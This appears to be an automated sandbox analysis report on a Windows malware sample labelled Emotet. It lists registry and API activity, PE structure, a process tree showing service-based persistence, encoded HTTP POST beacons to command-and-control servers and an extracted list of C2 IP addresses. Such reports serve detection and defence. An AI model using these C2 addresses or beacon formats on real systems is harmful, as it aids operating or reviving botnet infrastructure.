HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceCopyACLWithFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoEncryptOnMove
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\Environment
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.HeapAlloc
kernel32.dll.HeapFree
kernel32.dll.GetTickCount
oleaut32.dll.#200
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
comctl32.dll.#385
comctl32.dll.#320
comctl32.dll.#324
comctl32.dll.#323
ole32.dll.CreateBindCtx
ole32.dll.CoTaskMemAlloc
ole32.dll.CoGetApartmentType
ole32.dll.CoRegisterInitializeSpy
ole32.dll.CoTaskMemFree
comctl32.dll.#236
oleaut32.dll.#6
ole32.dll.CoGetMalloc
comctl32.dll.#328
comctl32.dll.#334
oleaut32.dll.#2
ole32.dll.CoCreateInstance
advapi32.dll.InitializeSecurityDescriptor
advapi32.dll.SetEntriesInAclW
ntmarta.dll.GetMartaExtensionInterface
advapi32.dll.SetSecurityDescriptorDacl
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
setupapi.dll.CM_Get_Device_Interface_List_ExW
comctl32.dll.#332
comctl32.dll.#386
advapi32.dll.IsTextUnicode
comctl32.dll.#338
comctl32.dll.#339
shell32.dll.#102
advapi32.dll.OpenThreadToken
propsys.dll.PSLookupPropertyHandlerCLSID
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryValueExW
advapi32.dll.RegCloseKey
propsys.dll.PSCreatePropertyStoreFromObject
propsys.dll.#417
propsys.dll.PropVariantToStringAlloc
ole32.dll.PropVariantClear
propsys.dll.PSCreateMemoryPropertyStore
propsys.dll.PropVariantToBuffer
propsys.dll.PropVariantToUInt64
propsys.dll.PropVariantToBoolean
propsys.dll.InitPropVariantFromBuffer
advapi32.dll.GetNamedSecurityInfoW
advapi32.dll.TreeSetNamedSecurityInfoW
ole32.dll.CoUninitialize
comctl32.dll.#329
comctl32.dll.#388
comctl32.dll.#321
ole32.dll.CoRevokeInitializeSpy
oleaut32.dll.#500
comctl32.dll.#387
comctl32.dll.#327
advapi32.dll.UnregisterTraceGuids
cryptsp.dll.CryptReleaseContext
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptGenKey
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptDuplicateHash
cryptsp.dll.CryptEncrypt
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
iphlpapi.dll.GetAdaptersAddresses
dhcpcsvc.dll.DhcpRequestParams
cryptsp.dll.CryptDecrypt
cryptsp.dll.CryptVerifySignatureW
C:\Users\user\AppData\Local\Temp\elVqUs.exe --291d5ab2
"C:\Windows\SysWOW64\gluerel.exe"
C:\Windows\SysWOW64\gluerel.exe --caeb0eba
rrtlnsuwfk
Global\IA4889F95
Global\MA4889F95
IESQMMUTEX_0_208
gluerel
gluerel

PE Information

Image Base 0x00400000
Entry Point 0x0040170b
Reported Checksum 0x00018d65
Actual Checksum 0x00018d65
Minimum OS Version 5.0
Compile Time 2012-09-03 09:06:24
Import Hash d4b43982e204014a37d1da76a3c65d78

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x000016bb 0x00001800 IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 3.98
.ret 0x00003000 0x00011086 0x00011200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 7.89

Imports

Library kernel32.dll:
0x403a28 CompareStringA
0x403a2c GetModuleFileNameA
0x403a30 LoadLibraryW
0x403a34 GetCurrentThread
0x403a3c CreateFileW
0x403a44 ReadProcessMemory
0x403a48 GetModuleHandleA
0x403a4c OpenMutexA
0x403a50 VirtualAlloc
0x403a58 SetLocalTime
0x403a5c GetTempPathA
Library certcli.dll:
0x403a64 CAEnumNextCA
0x403a68 CADeleteCA
0x403a6c CACloseCertType
0x403a70 CAEnumFirstCA
0x403a74 CACloseCA
Library advapi32.dll:
0x403a7c CreateServiceA
0x403a80 RegEnumKeyA
0x403a84 RegLoadKeyW
0x403a88 CryptSignHashA
0x403a8c ControlService
0x403a90 RegOpenKeyA
0x403a94 LogonUserW
0x403a98 RegDeleteValueW
0x403a9c RegCreateKeyExA
0x403aa0 OpenEventLogA
0x403aa4 StartServiceW
0x403aa8 RegRestoreKeyW
0x403aac RegUnLoadKeyW
0x403ab0 RegReplaceKeyA

.text
`.ret
umjukiloplkjhytgvfrtvbnjgf
VirtualAllocEx
gxxx_ro_e__Memory
kernel32.dll
foadLibraryExW
rrtlnsuwfk
npukeqplfmiv
dvwcrurjonpasvn
demjdbvpunhqfsss
VirtualAlloc
GetCurrentThread
GetTempPathA
CreateFileW
LoadLibraryW
GetModuleHandleA
ReadProcessMemory
CompareStringA
SetLocalTime
OpenMutexA
GetEnvironmentVariableW
FileTimeToSystemTime
GetEnvironmentVariableA
GetModuleFileNameA
kernel32.dll
CADeleteCA
CAEnumNextCA
CACloseCertType
CACloseCA
CAEnumFirstCA
certcli.dll
RegCreateKeyExA
RegLoadKeyW
RegEnumKeyA
RegDeleteValueW
RegOpenKeyA
StartServiceW
CryptSignHashA
RegRestoreKeyW
ControlService
OpenEventLogA
LogonUserW
RegReplaceKeyA
RegUnLoadKeyW
CreateServiceA
advapi32.dll
EAPPCFG.dll
This file is not on VirusTotal.

Process Tree


elVqUs.exe, PID: 2008, Parent PID: 2584
Full Path: C:\Users\user\AppData\Local\Temp\elVqUs.exe
Command Line: "C:\Users\user\AppData\Local\Temp\elVqUs.exe"
elVqUs.exe, PID: 2972, Parent PID: 2008
Full Path: C:\Users\user\AppData\Local\Temp\elVqUs.exe
Command Line: --291d5ab2
services.exe, PID: 460, Parent PID: 372
Full Path: C:\Windows\sysnative\services.exe
Command Line: C:\Windows\system32\services.exe
gluerel.exe, PID: 1088, Parent PID: 460
Full Path: C:\Windows\SysWOW64\gluerel.exe
Command Line: "C:\Windows\SysWOW64\gluerel.exe"
gluerel.exe, PID: 2444, Parent PID: 1088
Full Path: C:\Windows\SysWOW64\gluerel.exe
Command Line: --caeb0eba

Hosts

Direct IP Country Name
Y 90.57.69.215 [VT] France
Y 78.188.7.213 [VT] Turkey
Y 75.177.169.225 [VT] United States
Y 207.44.45.27 [VT] United States
Y 191.92.69.115 [VT] Colombia
Y 138.68.13.161 [VT] United States

TCP

Source Source Port Destination Destination Port
192.168.35.22 49177 138.68.13.161 8080
192.168.35.22 49178 138.68.13.161 8080
192.168.35.22 49179 138.68.13.161 8080
192.168.35.22 49180 138.68.13.161 8080
192.168.35.22 49181 138.68.13.161 8080
192.168.35.22 49173 191.92.69.115 80
192.168.35.22 49176 207.44.45.27 22
192.168.35.22 49174 75.177.169.225 80
192.168.35.22 49175 78.188.7.213 8090
192.168.35.22 49172 90.57.69.215 80

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

URI Data
http://138.68.13.161:8080/xian/
POST /xian/ HTTP/1.1
Referer: http://138.68.13.161/xian/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 138.68.13.161:8080
Content-Length: 427
Connection: Keep-Alive
Cache-Control: no-cache

c8gTrn24=NIkQDZEYiYrwuT3cSK5OvHgEXEzRYGK%2FDbt734Ir5wFLF6UHXCsPk3ZI6L8qAb1b8GgSkb3WE3PgsxS%2FBFFkg5t4BUkwAqBIXBwAIkmwErtwGHln7%2B3KInSptPltuORRyi0HtI85gdFJO9sm6J5Y3hnnSALwR5m4YhOjc8FxM79wPKyTLglNs6uF%2BqWPmWP53GwFVinFcbfha2skA%2Fh6xcMd4ZsLTgokBuUT5Zblk06dUEpDVb1wjutigQ42oL1W%2FcXmyxHcPZWyIm4mjv9tG78oiS84bJDSESYTeCllIP7EbU6l%2BXyI%2BPEzOIP3hIpsPhaaARHHqr%2FUPzk2oZ3EJiKGzRoUexh2ML5%2Fw9ajjgBLZFXJ3O%2FLFCveu9EdcSu3elskqg%3D%3D
http://138.68.13.161:8080/loadan/
POST /loadan/ HTTP/1.1
Referer: http://138.68.13.161/loadan/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 138.68.13.161:8080
Content-Length: 433
Connection: Keep-Alive
Cache-Control: no-cache

Fa0EUVGmWqX4iPtQ=uBRSJALyik76VOjpBGl3Mjda3ux4vd7hNSD2hwbmLl%2BCBdh%2FbkSPEGKk0l7JHGfPE4BSCCkMrVd6ufZcc9h9MGorJcxc2UJ5JQDotHWIsGoJuZVKgjtgCaKHId7bHrFiyi0HtI85gdFJO9sm6J5Y3hnnSALwR5m4YhOjc8FxM79wPKyTLglNs6uF%2BqWPmWP53GwFVinFcbfha2skA%2Fh6xcMd4ZsLTgokBuUT5Zblk06dUEpDVb1wjutigQ42oL1W%2FcXmyxHcPZWyIm4mjv9tG78oiS84bJDSESYTeCllIP7EbU6l%2BXyI%2BPEzOIP3hIpsPhaaARHHqr%2FUPzk2oZ3EJiKGzRoUexh2ML5%2Fw9ajjgBLZFXJ3O%2FLFCveu9EdcSu3elskqg%3D%3D
http://138.68.13.161:8080/pdf/devices/symbols/merge/
POST /pdf/devices/symbols/merge/ HTTP/1.1
Referer: http://138.68.13.161/pdf/devices/symbols/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 138.68.13.161:8080
Content-Length: 440
Connection: Keep-Alive
Cache-Control: no-cache

UeIXCtwVWxTZpID6FcF=UdmF0PFcsoX4%2FETG9CrhkGM2ubKxxJfJ6K8Bd%2FE5TOCHpJH09ZPjD9EAunTIQXcdMqUVVMr6%2FNZ%2F2a52nm6mbs21vFCIaORIIQcMJXt8WyePe3pg8TaawaI9WS9STodwyi0HtI85gdFJO9sm6J5Y3hnnSALwR5m4YhOjc8FxM79wPKyTLglNs6uF%2BqWPmWP53GwFVinFcbfha2skA%2Fh6xcMd4ZsLTgokBuUT5Zblk06dUEpDVb1wjutigQ42oL1W%2FcXmyxHcPZWyIm4mjv9tG78oiS84bJDSESYTeCllIP7EbU6l%2BXyI%2BPEzOIP3hIpsPhaaARHHqr%2FUPzk2oZ3EJiKGzRoUexh2ML5%2Fw9ajjgBLZFXJ3O%2FLFCveu9EdcSu3elskqg%3D%3D
http://138.68.13.161:8080/vermont/publish/
POST /vermont/publish/ HTTP/1.1
Referer: http://138.68.13.161/vermont/publish/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 138.68.13.161:8080
Content-Length: 430
Connection: Keep-Alive
Cache-Control: no-cache

zrvjf3thL=RTZms5%2FwN8bLiuJ42C6rLQneH8Czg1%2B526xAHaWa1xJ%2Bm9vGA924FzRuhUinNiU5JF5dd3Z8EdE%2FfREW9QUTtkBuTgzp9DO0CFpi8iYstpHph0TTbiwL6jrCdFufrp6Jyi0HtI85gdFJO9sm6J5Y3hnnSALwR5m4YhOjc8FxM79wPKyTLglNs6uF%2BqWPmWP53GwFVinFcbfha2skA%2Fh6xcMd4ZsLTgokBuUT5Zblk06dUEpDVb1wjutigQ42oL1W%2FcXmyxHcPZWyIm4mjv9tG78oiS84bJDSESYTeCllIP7EbU6l%2BXyI%2BPEzOIP3hIpsPhaaARHHqr%2FUPzk2oZ3EJiKGzRoUexh2ML5%2Fw9ajjgBLZFXJ3O%2FLFCveu9EdcSu3elskqg%3D%3D
http://138.68.13.161:8080/results/sess/
POST /results/sess/ HTTP/1.1
Referer: http://138.68.13.161/results/sess/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 138.68.13.161:8080
Content-Length: 424
Connection: Keep-Alive
Cache-Control: no-cache

XvIAb=e%2F238Au0n8U6pqn07P8WAkSlAY1cazBkFK5HR05DPRoXtWHyrnd4%2FtK4ddyqisGn2haxGg0D41I6g243%2BCC0J60ZRd1QLQhBSERmkTufIqxLjoGercApow8GNqWDWBwnyi0HtI85gdFJO9sm6J5Y3hnnSALwR5m4YhOjc8FxM79wPKyTLglNs6uF%2BqWPmWP53GwFVinFcbfha2skA%2Fh6xcMd4ZsLTgokBuUT5Zblk06dUEpDVb1wjutigQ42oL1W%2FcXmyxHcPZWyIm4mjv9tG78oiS84bJDSESYTeCllIP7EbU6l%2BXyI%2BPEzOIP3hIpsPhaaARHHqr%2FUPzk2oZ3EJiKGzRoUexh2ML5%2Fw9ajjgBLZFXJ3O%2FLFCveu9EdcSu3elskqg%3D%3D

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

Source Destination ICMP Type Data
191.92.69.115 192.168.35.22 3
191.92.69.115 192.168.35.22 3
191.92.69.115 192.168.35.22 3
207.44.45.27 192.168.35.22 3
207.44.45.27 192.168.35.22 3
207.44.45.27 192.168.35.22 3
75.177.169.225 192.168.35.22 3
78.188.7.213 192.168.35.22 3
78.188.7.213 192.168.35.22 3

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name gluerel.exe
Associated Filenames
C:\Windows\SysWOW64\gluerel.exe
File Size 76800 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 e6794e6260d39e25db2f04af257acc3f
SHA1 eabc4ee8576f54f4dcde5f6133e926f21ac5c44a
SHA256 4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2
CRC32 8CA4A6EF
Ssdeep 1536:DXgQIKlOUcKXCNUheD3fhNiuGnhzGYXgAq1oaW:D3sUtyNUhelGhaM
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
Type Emotet Config
address
194.231.182.196:33907
232.114.233.73:36713
250.138.162.203:22576
151.16.106.135:1895
94.204.209.71:35825
13.183.97.146:21289
25.125.141.26:17210
144.116.123.156:28710
209.250.66.149:32174
153.122.88.166:42768
170.74.92.38:28309
156.218.156.44:41508
226.120.21.150:61415
45.253.221.86:39497
245.251.164.105:5067
146.1.232.130:56026
28.161.84.221:27605
215.253.113.127:2580
